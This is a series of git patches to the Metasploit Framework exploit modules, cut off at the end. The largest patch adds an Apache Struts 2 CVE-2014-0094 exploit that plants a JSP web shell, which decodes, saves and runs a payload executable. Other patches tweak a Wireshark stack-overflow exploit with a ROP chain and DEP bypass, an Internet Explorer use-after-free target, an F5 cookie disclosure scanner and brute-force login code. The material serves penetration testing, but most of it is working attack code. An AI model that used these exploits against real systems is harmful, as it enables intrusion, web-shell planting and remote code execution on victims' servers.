.../fileformat/wireshark_mpeg_overflow.rb | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb index dc4146c897..0a44041cad 100644 --- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow', + 'Name' => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating an malicious file.) @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Wesley Neelen', # Discovery vulnerability + 'Wesley Neelen', # Discovery vulnerability 'j0sm1', # Exploit and msf module ], 'References' => @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2014-2299'], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ], [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ], - [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ] + [ 'BID', '66066'] ], 'DefaultOptions' => { @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\xff", 'Space' => 600, 'DisableNops' => 'True', - 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 + 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 }, 'Platform' => 'win', 'Targets' => @@ -49,11 +49,11 @@ class Metasploit3 < Msf::Exploit::Remote { 'OffSet' => 69732, 'OffSet2' => 70476, - 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) + 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 'jmpesp' => 0x68e2bfb9, } ], - [ 'WinXP SP2/SP3 English (bypass DEP)', + [ 'WinXP SP2/SP3 English (bypass DEP)', { 'OffSet2' => 70692, 'OffSet' => 70476, @@ -75,25 +75,25 @@ class Metasploit3 < Msf::Exploit::Remote def create_rop_chain() # rop chain generated with mona.py - www.corelan.be - rop_gadgets = + rop_gadgets = [ 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] - 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] - 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x00000201, # 0x00000201-> ebx - 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] + 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] 0x00000040, # 0x00000040-> edx 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x668242b9, # &Writable location [libgnutls-26.dll] 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] - 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x90909090, # nop - 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] ].flatten.pack("V*") return rop_gadgets From 1c88dea7d605abafdd085c9a70965b96c434bd53 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 16:23:05 -0500 Subject: [PATCH 191/853] Exploitation also works with flash 13 --- modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index 86be4d034d..adcefa77fe 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb +++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote :ua_name => Msf::HttpClients::IE, :ua_ver => '10.0', :mshtml_build => lambda { |ver| ver.to_i < 16843 }, - :flash => /^12\./ + :flash => /^1[23]\./ }, 'DefaultOptions' => { From fe3f7fd76ab466dee61451332842ab0cd13335e7 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 23:26:29 +0200 Subject: [PATCH 192/853] Obey to reviewer.. code fix --- .../gather/f5_bigip_cookie_disclosure.rb | 45 ++++++++----------- 1 file changed, 19 insertions(+), 26 deletions(-) diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index a174f77928..536729a32d 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -52,10 +52,9 @@ class Metasploit3 < Msf::Auxiliary 'uri' => @uri }) id,value = nil - begin - # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" - m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - ensure + # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" + m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + unless m.nil? id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] return id, value @@ -63,37 +62,31 @@ class Metasploit3 < Msf::Auxiliary end def run - host_port = Array.new + host_port = [] @uri = normalize_uri(target_uri.path) print_status("Starting request #{@uri}") - id, value = get_cookie() - unless id - print_error "F5 SLB cookie not found" - return - end - print_status ("F5 cookie \"#{id}\" found") - host, port = cookie_decode(value) - host_port.push(host+":"+port) - print_status "Backend #{host}:#{port}" - i=1 # We already have done one request - until i == datastore['RETRY'] - id, value = get_cookie() + for i in 0...datastore['RETRY'] + id, value = get_cookie() # Get the cookie + # If the cookie is not found, stop process + unless id + print_error("F5 SLB cookie not found") + return + end + # Print the cookie name on the first request + if i == 0 + print_status("F5 cookie \"#{id}\" found") + end host, port = cookie_decode(value) unless host_port.include? (host+":"+port) host_port.push(host+":"+port) - print_status "Backend #{host}:#{port}" + print_status("Backend #{host}:#{port}") end - i += 1 - end - # Reporting found backend in database - backends = Array.new - host_port.each do |key| - backends.push (key) end + # Reporting found backends in database report_note( - :host => datastore['RHOST'], + :host => rhost, :type => "F5_Cookie_Backends", - :data => backends + :data => host_port ) end end From 70314494cad3bac71bb80f893d51a99f7abf82cc Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 23:33:01 +0200 Subject: [PATCH 193/853] test nil of port & host --- .../auxiliary/gather/f5_bigip_cookie_disclosure.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index 536729a32d..b1b57bd1d3 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -37,12 +37,14 @@ class Metasploit3 < Msf::Auxiliary m = cookie_value.match(/(\d+)\.(\d+)\./) host = (m.nil?) ? nil : m[1] port = (m.nil?) ? nil : m[2] - port = (("%04X" % port).slice(2,4) << ("%04X" % port).slice(0,2)).hex.to_s - byte1 = ("%08X" % host).slice(6..7).hex.to_s - byte2 = ("%08X" % host).slice(4..5).hex.to_s - byte3 = ("%08X" % host).slice(2..3).hex.to_s - byte4 = ("%08X" % host).slice(0..1).hex.to_s - host = byte1 << "." << byte2 << "." << byte3 << "." << byte4 + unless host.nil? && port.nil? + port = (("%04X" % port).slice(2,4) << ("%04X" % port).slice(0,2)).hex.to_s + byte1 = ("%08X" % host).slice(6..7).hex.to_s + byte2 = ("%08X" % host).slice(4..5).hex.to_s + byte3 = ("%08X" % host).slice(2..3).hex.to_s + byte4 = ("%08X" % host).slice(0..1).hex.to_s + host = byte1 << "." << byte2 << "." << byte3 << "." << byte4 + end return host,port end From eb98ea2d3191e5562095e9d05c62315d69376967 Mon Sep 17 00:00:00 2001 From: nstarke Date: Mon, 28 Apr 2014 21:45:14 +0000 Subject: [PATCH 194/853] Large pass_file hangs login modules SeeRM #8704 When running a *_login module that contains a large PASS_FILE the module appears to hang while it is creating the combinations over such a large dataset. The solution proposed in the Redmine task requested that the user be alerted with some sort of progress feedback if the process takes an excessive amount of time. I have added a message that logs to the console that contains the number of pairs left to be constructed before the module will continue. The verbiage is fairly arbitrary and should probably be updated to something that might be more descriptive. Likewise, the sleep interval may need to be adjusted. --- lib/msf/core/auxiliary/auth_brute.rb | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb index dc70d93349..076e818f5f 100644 --- a/lib/msf/core/auxiliary/auth_brute.rb +++ b/lib/msf/core/auxiliary/auth_brute.rb @@ -330,6 +330,23 @@ module Auxiliary::AuthBrute end creds = [ [], [], [], [] ] # userpass, pass, user, rest + remaining_pairs = combined_array.length # counter for our occasional output + status = Thread.new do + loop do + # Ruby's sleep function is not terribly accurate. + # Since all we are trying to do is let the user know + # that the process is still working and giving them + # an estimate as to how many pairs are left, + # precision may not be of the utmost necessity + sleep 100 + # Let the user know the combined pair list is still building + # and tell them how many pairs are left to process. + print_brute( + :level => :vstatus, + :msg => "Pair list is still building with #{remaining_pairs} pairs left to process" + ) + end + end # Move datastore['USERNAME'] and datastore['PASSWORD'] to the front of the list. # Note that we cannot tell the user intention if USERNAME or PASSWORD is blank -- # maybe (and it's often) they wanted a blank. One more credential won't kill @@ -344,7 +361,9 @@ module Auxiliary::AuthBrute else creds[3] << pair end + remaining_pairs -= 1 end + status.kill return creds[0] + creds[1] + creds[2] + creds[3] end From 60b9f855b4778ee7781ee090d7df7b42c23958f4 Mon Sep 17 00:00:00 2001 From: Rich Lundeen Date: Mon, 28 Apr 2014 18:44:02 -0700 Subject: [PATCH 195/853] Bug with HTTP POST requests (content type sent twice) --- modules/auxiliary/server/http_ntlmrelay.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index e5bfe4631b..dc41935c48 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -269,11 +269,6 @@ class Metasploit3 < Msf::Auxiliary theaders = ('Authorization: NTLM ' << hash << "\r\n" << "Connection: Keep-Alive\r\n" ) - if (method == 'POST') - theaders << 'Content-Length: ' << - (@finalputdata.length + 4).to_s()<< "\r\n" - end - # HTTP_HEADERFILE is how this module supports cookies, multipart forms, etc if datastore['HTTP_HEADERFILE'] != nil print_status("Including extra headers from: #{datastore['HTTP_HEADERFILE']}") From 17a508af34c919bbc2abda4556bfbdc2c139e64a Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 29 Apr 2014 03:50:45 +0200 Subject: [PATCH 196/853] Add CVE-2014-0094 RCE for Struts 2 --- .../http/struts_code_exec_classloader.rb | 244 ++++++++++++++++++ 1 file changed, 244 insertions(+) create mode 100644 modules/exploits/multi/http/struts_code_exec_classloader.rb diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb new file mode 100644 index 0000000000..32331e4400 --- /dev/null +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -0,0 +1,244 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in Apache Struts + versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows + for the use of parentheses which in turn allows it to interpret parameter values as + OGNL expressions during certain exception handling for mismatched data types of + properties which allows remote attackers to execute arbitrary Java code via a + crafted parameter. + }, + 'Author' => + [ + 'Meder Kydyraliev', # Vulnerability Discovery and PoC + 'Richard Hicks ', # Metasploit Module + 'mihi' #ARCH_JAVA support + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2011-3923'], + [ 'OSVDB', '78501'], + [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'], + [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009'] + ], + 'Platform' => %w{ java linux win }, + 'Privileged' => true, + 'Targets' => + [ + ['Windows Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'windows' + } + ], + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + [ 'Java Universal', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java' + }, + ] + ], + 'DisclosureDate' => 'Oct 01 2011', + 'DefaultTarget' => 2)) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]), + OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/hello_world/hello.action?INJECT"]), + OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) + ], self.class) + end + + def execute_command(cmd, opts = {}) +=begin + inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" + inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true" + inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) + inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + uri.gsub!(/INJECT/,inject) # append the injection string + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + return resp #Used for check function. +=end + + inject = "class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT" + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + + uri.gsub!(/INJECT/,inject) # append the injection string + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + + inject = "class['classLoader'].resources.context.parent.pipeline.first.prefix=shell" + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + + uri.gsub!(/INJECT/,inject) # append the injection string + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + inject = "class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp" + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + + uri.gsub!(/INJECT/,inject) # append the injection string + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + + inject = "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=1" + uri = String.new(datastore['TARGETURI']) + uri = normalize_uri(uri) + + uri.gsub!(/INJECT/,inject) # append the injection string + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + + + uri = "/hello_world/echo.jsp?a=<% Runtime.getRuntime().exec("/usr/bin/gnome-terminal"); %>" + uri = normalize_uri(uri) + + + resp = send_request_cgi({ + 'uri' => uri, + 'version' => '1.1', + 'method' => 'GET', + }) + + + + + return resp + + end + + def exploit +=begin + #Set up generic values. + @payload_exe = rand_text_alphanumeric(4+rand(4)) + pl_exe = generate_payload_exe + append = 'false' + #Now arch specific... + case target['Platform'] + when 'linux' + @payload_exe = "/tmp/#{@payload_exe}" + chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))" + exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))" + when 'java' + @payload_exe << ".jar" + pl_exe = payload.encoded_jar.pack + exec_cmd = "" + exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," + exec_cmd << "#q.setAccessible(true),#q.set(null,true)," + exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," + exec_cmd << "#q.setAccessible(true),#q.set(null,false)," + exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})," + exec_cmd << "#c=#cl.loadClass('metasploit.Payload')," + exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" + exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" + when 'windows' + @payload_exe = "./#{@payload_exe}.exe" + exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')" + else + fail_with(Failure::NoTarget, 'Unsupported target platform!') + end + + #Now with all the arch specific stuff set, perform the upload. + #109 = length of command string plus the max length of append. + sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length + chunk_length = 2048 - sub_from_chunk + chunk_length = ((chunk_length/4).floor)*3 + while pl_exe.length > chunk_length + java_upload_part(pl_exe[0,chunk_length],@payload_exe,append) + pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] + append = true + end + java_upload_part(pl_exe,@payload_exe,append) + execute_command(chmod_cmd) if target['Platform'] == 'linux' + execute_command(exec_cmd) + register_files_for_cleanup(@payload_exe) +=end + + execute_command("a") + + end + + def java_upload_part(part, filename, append = 'false') + cmd = "" + cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append})," + cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," + cmd << "#f.close()" + execute_command(cmd) + end + + def check + sleep_time = datastore['CHECK_SLEEPTIME'] + check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" + t1 = Time.now + vprint_status("Asking remote server to sleep for #{sleep_time} seconds") + response = execute_command(check_cmd) + t2 = Time.now + delta = t2 - t1 + + + if response.nil? + return Exploit::CheckCode::Safe + elsif delta < sleep_time + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Appears + end + end + +end + From a78aae08cf3a24a50f970ddfee7a4c14ee94a373 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 29 Apr 2014 03:58:04 +0200 Subject: [PATCH 197/853] Add CVE-2014-0094 RCE for Struts 2 --- .../http/struts_code_exec_classloader.rb | 232 +++++------------- 1 file changed, 66 insertions(+), 166 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 32331e4400..d6f11c9fac 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -14,28 +14,26 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Apache Struts - versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows - for the use of parentheses which in turn allows it to interpret parameter values as - OGNL expressions during certain exception handling for mismatched data types of - properties which allows remote attackers to execute arbitrary Java code via a - crafted parameter. + versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows + access to 'class' parameter which is directly mapped to getClass() method and + allows ClassLoader manipulation, which allows remote attackers to execute arbitrary + Java code via crafted parameters. }, 'Author' => [ - 'Meder Kydyraliev', # Vulnerability Discovery and PoC - 'Richard Hicks ', # Metasploit Module - 'mihi' #ARCH_JAVA support + 'Mark Thomas and Przemyslaw Celej', # Vulnerability Discovery + 'Alvaro Munoz', # PoC + 'Redsadic ' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2011-3923'], - [ 'OSVDB', '78501'], - [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'], - [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009'] + [ 'CVE', '2014-0094'], + [ 'URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'], + [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] ], 'Platform' => %w{ java linux win }, 'Privileged' => true, @@ -60,184 +58,86 @@ class Metasploit3 < Msf::Exploit::Remote }, ] ], - 'DisclosureDate' => 'Oct 01 2011', + 'DisclosureDate' => 'Mar 06 2014', 'DefaultTarget' => 2)) register_options( [ Opt::RPORT(8080), - OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]), - OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/hello_world/hello.action?INJECT"]), - OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) + OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/hello_world/hello.action"]) ], self.class) end - def execute_command(cmd, opts = {}) -=begin - inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" - inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true" - inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) - inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - uri.gsub!(/INJECT/,inject) # append the injection string + + def exec_cmd(uri, cmd = "") resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - return resp #Used for check function. -=end - - inject = "class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT" - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - - uri.gsub!(/INJECT/,inject) # append the injection string - - - resp = send_request_cgi({ - 'uri' => uri, + 'uri' => uri+cmd, 'version' => '1.1', 'method' => 'GET', }) - - inject = "class['classLoader'].resources.context.parent.pipeline.first.prefix=shell" - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - - uri.gsub!(/INJECT/,inject) # append the injection string - - - resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - - inject = "class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp" - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - - uri.gsub!(/INJECT/,inject) # append the injection string - - - resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - - - inject = "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=1" - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - - uri.gsub!(/INJECT/,inject) # append the injection string - - - resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - - - - uri = "/hello_world/echo.jsp?a=<% Runtime.getRuntime().exec("/usr/bin/gnome-terminal"); %>" - uri = normalize_uri(uri) - - - resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - - - - return resp + end + + def peer + "#{rhost}:#{rport}" end def exploit -=begin - #Set up generic values. - @payload_exe = rand_text_alphanumeric(4+rand(4)) - pl_exe = generate_payload_exe - append = 'false' - #Now arch specific... - case target['Platform'] - when 'linux' - @payload_exe = "/tmp/#{@payload_exe}" - chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))" - exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))" - when 'java' - @payload_exe << ".jar" - pl_exe = payload.encoded_jar.pack - exec_cmd = "" - exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," - exec_cmd << "#q.setAccessible(true),#q.set(null,true)," - exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," - exec_cmd << "#q.setAccessible(true),#q.set(null,false)," - exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})," - exec_cmd << "#c=#cl.loadClass('metasploit.Payload')," - exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" - exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" - when 'windows' - @payload_exe = "./#{@payload_exe}.exe" - exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')" - else - fail_with(Failure::NoTarget, 'Unsupported target platform!') - end - #Now with all the arch specific stuff set, perform the upload. - #109 = length of command string plus the max length of append. - sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length - chunk_length = 2048 - sub_from_chunk - chunk_length = ((chunk_length/4).floor)*3 - while pl_exe.length > chunk_length - java_upload_part(pl_exe[0,chunk_length],@payload_exe,append) - pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] - append = true - end - java_upload_part(pl_exe,@payload_exe,append) - execute_command(chmod_cmd) if target['Platform'] == 'linux' - execute_command(exec_cmd) - register_files_for_cleanup(@payload_exe) -=end + prefix_jsp = rand_text_alphanumeric(3+rand(3)) + date_format = rand_text_numeric(1+rand(4)) - execute_command("a") + vprint_status("#{peer} - Modifying class loader") + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") - end + jsp_file = prefix_jsp + jsp_file << date_format + jsp_file << ".jsp" - def java_upload_part(part, filename, append = 'false') - cmd = "" - cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append})," - cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," - cmd << "#f.close()" - execute_command(cmd) - end + vprint_status("#{peer} - created file at http://#{peer}/#{jsp_file}") - def check - sleep_time = datastore['CHECK_SLEEPTIME'] - check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" - t1 = Time.now - vprint_status("Asking remote server to sleep for #{sleep_time} seconds") - response = execute_command(check_cmd) - t2 = Time.now - delta = t2 - t1 + sleep(3) + + uri = String.new(datastore['TARGETURI']) + uri << rand_text_alphanumeric(4+rand(4)) + uri << "?" + uri << rand_text_alphanumeric(1+rand(1)) + uri << "=" - if response.nil? - return Exploit::CheckCode::Safe - elsif delta < sleep_time - return Exploit::CheckCode::Safe - else - return Exploit::CheckCode::Appears - end + payload_exe = generate_payload_exe + + payload_file = rand_text_alphanumeric(4+rand(4)) + register_files_for_cleanup("#{payload_file}", "#{jsp_file}") + + exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>") + exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>") + exec_cmd(uri, "<%@ page import=\"java.io.File\" %>") + + exec_cmd(uri, "<% FileOutputStream oFile = new FileOutputStream(\"#{payload_file}\", false); %>") + exec_cmd(uri, "<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(payload_exe)}\")); %>") + exec_cmd(uri, "<% oFile.flush(); %>") + exec_cmd(uri, "<% oFile.close(); %>") + exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>") + exec_cmd(uri, "<% f.setExecutable(true); %>") + exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>") + + vprint_status("#{peer} - Waiting 10 seconds...") + + sleep(10) + + vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}") + + uri = "/" + uri << jsp_file + + exec_cmd(uri) + end end From b2c2245aff0eba40a98ebda7db67c97271d6cfcc Mon Sep 